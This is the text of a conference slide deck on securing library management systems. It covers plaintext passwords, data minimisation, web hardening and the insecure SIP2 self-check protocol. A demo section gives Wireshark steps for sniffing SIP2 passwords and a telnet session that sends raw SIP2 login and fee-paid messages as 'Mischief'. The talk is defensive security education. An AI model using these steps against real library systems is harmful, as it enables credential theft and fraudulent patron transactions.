Title Text
Securing your Library Management System
Chris Cormack
Who am I?
- Kāi Tahu, Kāti Mamoe, Waitaha
- BSc Compsci, BA Maths and Māori Studies
- One of the original Koha developers
- Working at Catalyst IT
- Make my kids dress like me
- @ranginui
- chrisc@catalyst.net.nz
Know your attack surface
- Plain text passwords
- Dataleak
- Website
- Selfcheck
- 3rd party content vendor
- Social engineering
Plain text passwords
If you can view yours, or any of your users passwords, you should never ever ever use that system again
- Chris Cormack 2017
Data leak
- Don't collect what you don't need
- Don't keep what you no longer need
- Anonymise where possible
CC-BY Selka
Website(s)
- OWASP top 10
- https (tls 1.2)
- XSS
- SQLi
- ssllabs
- letsencrypt
Selfcheck
SIP2 ... it's not cool
NCIP ... it's not cool still, but bloated
Mitigations
- stunnel
- ssh tunnel
- restful api over tls
cc-by-sa Jeffrey Beall
Let's try some stuff
SSID: Anatokai
Pass: SuperSecure
https://pastebin.com/ujfn3YET
Finding the password
- Start wireshark (as root/administrator)
- Capture on wlan0 (or equivalent)
- Edit->Find Packets
- Packet Bytes, String, search for |CP
Mischief
telnet 6001
9300CNterm1|COterm1|CPcpl|
2300120170714 004452AOcpl|AAchrisc|ACterm1|AD|
3720170714 0039390100USDBV100|AO|AAchrisc|ACterm1|
2300120170714 004452AOcpl|AAchrisc|ACterm1|AD|
3rd party systems
Often want to use SIP2
Sometimes store stuff
How do we know?
Social Engineering
You just spent a bunch of time attached to
my wifi AP, because I asked you to
Securing your LMS
By Chris Cormack
